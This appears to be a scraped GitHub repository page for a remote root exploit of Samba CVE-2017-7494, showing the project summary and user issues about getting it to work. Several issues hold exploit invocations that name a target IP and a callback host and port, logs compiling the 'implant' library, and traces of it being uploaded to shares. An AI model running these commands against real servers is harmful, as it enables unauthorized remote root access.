joxeankoret / cve-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability

License: GNU General Public License v3.0

Makefile 0.01% C 0.07% Python 99.88% Batchfile 0.01% Shell 0.04%

cve-2017-7494's People

Contributors

joxeankoret

cve-2017-7494's Issues

How to use it?

Hi, I'm very curious about how to use it.
Can you add a tutorial to use it?

Thanks. Great job.

Failed to locate the module

Hello,

I was trying to run the exploit, but always got the same message: it seems like the exploit doesn't find the module on the target.

Any help to get this to work? I tried to upload the module using smbclient, but still got the same message.

PS. If the no-compile option is 0, I get several library errors for 32 bits.

python cve_2017_7494.py -t 172.16.1.107 -p 445 --rhost=172.20.1.162 --rport=443 -m //libimplantx64.so --no-compile=1
[Wed Sep 5 10:53:05 2018] I will keep the current binaries. No need for new compilation.
[Wed Sep 5 10:53:05 2018] Logging into the Samba server 172.16.1.107:445
[Wed Sep 5 10:53:06 2018] Using a GUEST session
[Wed Sep 5 10:53:06 2018] Trying to load module /
/libimplantx64.so
[Wed Sep 5 10:53:07 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

IOError: [Errno 2] No such file or directory: 'libimplantx64.so'

Trying to use the exploit on port 139:
python cve_2017_7494.py -t -p 139 --rhost --rport 31337 -n 1

And I got this output:

[..] I will keep the current binaries. No need for new compilation.
[..] Logging into the Samba server ip:port
[..] Using a GUEST session
[..] Using libimplantx64.so
[..] Trying to copy library 'n5R8qbmA.so' to share '[u'docs', u'/usr/share/doc']'
Traceback (most recent call last):
File "cve_2017_7494.py", line 254, in <module>
main()
File "cve_2017_7494.py", line 248, in main
if exploit.exploit():
File "cve_2017_7494.py", line 196, in exploit
server_directory = self.try_copy_library(lib_name)
File "cve_2017_7494.py", line 165, in try_copy_library
if self.try_put(share, lib_name, real_file):
File "cve_2017_7494.py", line 117, in try_put
with open(real_file, "rb") as f:
IOError: [Errno 2] No such file or directory: 'libimplantx64.so'

Cannot resolve local IP address.

Traceback (most recent call last):
File "cve_2017_7494.py", line 212, in <module>
main()
File "cve_2017_7494.py", line 206, in main
if exploit.exploit():
File "cve_2017_7494.py", line 161, in exploit
if not self.make_library():
File "cve_2017_7494.py", line 89, in make_library
raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!

how does this determine the full path?

I am trying to use this exploit against a samba 3.5.11 server but it's not working out of the box. The writable share is called /test and this exploit is trying to use the full path /usr/local/samba/tmp/. I am going through the source but thought it might be useful to ask directly how this exploit is determining this path.

Thank you!

root@kali:/CVE-2017-7494# python cve_2017_7494.py -t 10.11.1.129
[Sun Dec 16 10:21:39 2018] Building libraries...
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx64.so
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
[Sun Dec 16 10:21:39 2018] Logging into the Samba server 10.11.1.129:445
[Sun Dec 16 10:21:40 2018] Using a GUEST session
[Sun Dec 16 10:21:40 2018] Using libimplantx64.so
[Sun Dec 16 10:21:40 2018] Trying to copy library 'T1XOvrsK.so' to share '[u'test', u'/usr/local/samba/tmp']'
[Sun Dec 16 10:21:41 2018] Done!
[Sun Dec 16 10:21:41 2018] Trying to copy random library T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Trying to load module /usr/local/samba/tmp/T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Ubuntu 18.04 running error

gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
In file included from implant.c:16:0:
/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory
 #include <bits/libc-header-start.h>
          ^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
Makefile:10: recipe for target 'libimplantx32.so' failed
make: *** [libimplantx32.so] Error 1

Error in test

Dear Joxean,

I'm testing one of my vulnerability machines with samba smbd 4.3.8-Ubuntu, and found your code.
I tried to reproduce the exploit, but this is the error I got:

python cve_2017_7494.py -t 192.168.1.220
Traceback (most recent call last):
File "cve_2017_7494.py", line 212, in <module>
main()
File "cve_2017_7494.py", line 206, in main
if exploit.exploit():
File "cve_2017_7494.py", line 161, in exploit
if not self.make_library():
File "cve_2017_7494.py", line 89, in make_library
raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!

Can you tell me what I did wrong? Do I need to change the IP address in the config file?

Thank you so much for your help.

No module named Util.number

I've cloned the master branch, I've installed the requirements via a venv, and I get this error when running the exploit.

python2 cve_2017_7494.py -t 192.168.1.84 
Traceback (most recent call last):
  File "cve_2017_7494.py", line 20, in <module>
    from impacket.dcerpc.v5 import transport, srvs
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/dcerpc/v5/transport.py", line 18, in <module>
    from impacket.smbconnection import smb, SMBConnection
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smbconnection.py", line 20, in <module>
    from impacket import smb, smb3, nmb, nt_errors, LOG
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smb.py", line 53, in <module>
    from impacket.krb5.gssapi import KRB5_AP_REQ
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/gssapi.py", line 17, in <module>
    from Crypto.Hash import HMAC, MD5
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/Crypto.py", line 48, in <module>
    from Crypto.Util.number import GCD as gcd
ImportError: No module named Util.number

I've installed both packages:

# pip install pycrypto
# pip show pycrypto
Name: pycrypto
Version: 2.6.1
Summary: Cryptographic modules for Python.
Home-page: http://www.pycrypto.org/
Author: Dwayne C. Litzenberger
Author-email: [email protected]
License: UNKNOWN
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires: 
Required-by: 
# pip install pycryptodome
# pip show pycryptodome
Name: pycryptodome
Version: 3.10.1
Summary: Cryptographic library for Python
Home-page: https://www.pycryptodome.org
Author: Helder Eijs
Author-email: [email protected]
License: BSD, Public Domain
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires: 
Required-by: 

What have I done wrong? Any ideas? Thanks :)

SMB SessionError

Need help on this
[Mon Nov 23 23:34:38 2020] I will keep the current binaries. No need for new compilation.
[Mon Nov 23 23:34:38 2020] Logging into the Samba server 10.0.2.18:445
[Mon Nov 23 23:34:38 2020] Using a GUEST session
[Mon Nov 23 23:34:38 2020] Using libimplantx64.so
[Mon Nov 23 23:34:38 2020] Trying to copy library 'JJAnPsko.so' to share '[u'print$', u'/var/lib/samba/printers']'
[Mon Nov 23 23:34:38 2020] Done!
[Mon Nov 23 23:34:38 2020] Trying to copy random library JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Trying to load module /var/lib/samba/printers/JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
